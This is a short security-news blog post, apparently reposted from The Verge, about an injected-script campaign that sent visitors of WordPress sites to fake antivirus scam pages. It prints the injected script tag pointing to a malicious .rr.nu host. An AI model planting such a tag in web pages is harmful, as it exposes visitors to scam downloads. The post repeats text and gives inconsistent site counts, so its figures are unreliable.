Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected
More than 200,000 websites with fake anti-virus software, almost 30,000 unique sites has already been compromised with this fake anti-virus exploit. According to computer security group Websense, the exploit, which mostly affects sites built with WordPress, places a short piece of injected code at the bottom of a page:-
</DIV><!--END body=wrapper ==>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY></HTML>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY></HTML>
When a user loads the page, they're redirected to a page in the .rr.nu top-level domain that mimics a Windows security scan, then asks them to download a malicious program to supposedly clear viruses from their computer. It's a scam that's been running in various forms for years, and Websense says it's been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.
Earlier in 2011 we have also seen such scenario when 614,000 webpages comromised with mass ASP.NET Infection, also Willysy malware Infects More than 6 Million WeSites, Lilupophilupop Attack took 1 Million+ Web-pages and so on.
-Source (The Verge)
LINK TO OUR HOME PAGE :
Voice Of GREYHAT is a non-profit Organization propagating news specifically related with Cyber security threats, Hacking threads and issues from all over the spectrum. The news provided by us on this site is gathered from various Re-Sources. if any person have some FAQ's in their mind they can Contact Us. Also you can read our Privacy Policy for more info.
Thank You !
-Team VOGH
If you enjoyed VOGH News, Articles Then Do Make sure you to Subscribe Our RSS feed. Stay Tuned with VOGH and get Updated about Cyber Security News, Hacking Threads and Lots More. All our Articles and Updates will directly be sent to Your Inbox. Thank You!
-Team VOGH
Categories:
security-news
,
vulnerablity
